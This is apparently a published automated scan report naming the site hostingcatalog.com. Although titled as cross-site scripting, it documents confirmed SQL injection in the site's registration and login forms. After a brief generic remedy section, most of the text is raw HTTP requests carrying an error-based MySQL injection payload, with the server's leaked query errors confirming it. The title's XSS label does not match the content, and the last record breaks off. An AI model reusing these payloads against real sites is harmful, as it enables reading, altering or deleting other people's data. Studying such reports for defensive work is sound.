XSS, Cross Site Scripting in www.hostingcatalog.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY
Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.
Netsparker - Scan Report Summary
TARGET URL
http://www.hostingcatalog.com/banner.php?id=3...
SCAN DATE
4/24/2011 6:56:40 AM
REPORT DATE
4/24/2011 10:37:37 AM
SCAN DURATION
02:25:02
Total Requests
Average Speed
req/sec.
167 identified
147 confirmed
29 critical
5 informational
GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled
VULNERABILITIES
VULNERABILITY SUMMARY
SQL Injection
SQL Injection occurs when input data, for example from a user, is interpreted as a SQL command rather than as normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL query on the back-end database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attack:
Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database
Actions to Take
See the remedy for the solution.
If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object-relational mapping). Most ORM systems use only parameterised queries, and this can solve the whole SQL Injection problem.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
Use your web logs and application logs to see if there was any previous but undetected attack on this resource.
A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.
External References
Remedy References
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 767 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&copy_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 354 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE company_name=''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 748 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith&copy_from_cont=1&country=240&deposit=3&e_mail='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:50:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
B1
POST
Login
form_field
POST
1
password
POST
3
remember_both
POST
1
remember_mail
POST
1
temp_check
POST
755
user_login
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
5.0.77
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 364 Accept-Encoding: gzip, deflate B1=Login&form_field=1&password=3&remember_both=1&remember_mail=1&temp_check=755&user_login='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:58:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 383 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' AND active NOT IN (2,3,4)
Parameters
Parameter
Type
Value
company_name
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 728 Accept-Encoding: gzip, deflate company_name='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:16:23 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 354 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE company_name=''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 709 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:18:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 745 Accept-Encoding: gzip, deflate company_name='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:37:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 354 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE company_name=''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 726 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:39:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:0' for key 1 in SQL SELECT account_id FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 730 Accept-Encoding: gzip, deflate company_name='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:58:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 354 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:1' for key 1 in SQL SELECT account_id FROM account WHERE company_name=''+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 711 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:00:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 349 Connection: close Content-Type: text/html; charset=UTF-8 Error #1062: Duplicate entry '_!@4dilemma:0' for key 1 in SQL SELECT account_id FROM account WHERE e_mail=''+(select 1 and row(1,1)>(select count(*),concat(concat(char(95),char(33),char(64),char(52),char(100),char(105),char(108),char(101),char(109),char(109),char(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''
Parameters
Parameter
Type
Value
company_name
POST
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
5.0.77
Request
